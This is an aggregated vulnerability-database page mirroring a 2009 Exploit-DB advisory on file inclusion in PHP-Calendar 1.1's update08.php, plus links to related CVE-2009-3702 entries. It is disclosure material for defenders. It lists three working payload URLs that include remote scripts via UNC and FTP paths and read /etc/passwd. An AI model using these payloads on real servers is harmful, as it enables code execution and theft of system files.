Lucene search
Juan Galiana LaraEDB-ID:33436HistoryDec 21, 2009 - 12:00 a.m.
PHP-Calendar 1.1 - 'update08.php?configfile' Traversal Local File Inclusion
2009-12-2100:00:00
Juan Galiana Lara
www.exploit-db.com
20
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/37450/info
PHP-Calendar is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
PHP-Calendar 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php
http://www.example.com/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@site/path/to/file.php
http://www.example.com/php-calendar-1.1/update08.php?configfile=/etc/passwd Related
seebug
seebug
PHP-Calendar configfileειθΏη¨ζδ»Άε
ε«ζΌζ΄
2009-12-25 00:00:00
securityvulns
securityvulns
exploitdb
exploitdb
prion
prion
Path traversal
2009-12-22 19:30:00
cvelist
cvelist
CVE-2009-3702
2009-12-22 19:00:00
openvas
openvas
PHP-Calendar Multiple Remote And Local File Inclusion Vulnerabilities
2009-12-31 00:00:00
cve
cve
CVE-2009-3702
2009-12-22 19:30:00
packetstorm
packetstorm
PHP-Calendar 1.1 Remote/Local File Inclusion
2009-12-18 00:00:00
nvd
nvd
CVE-2009-3702
2009-12-22 19:30:00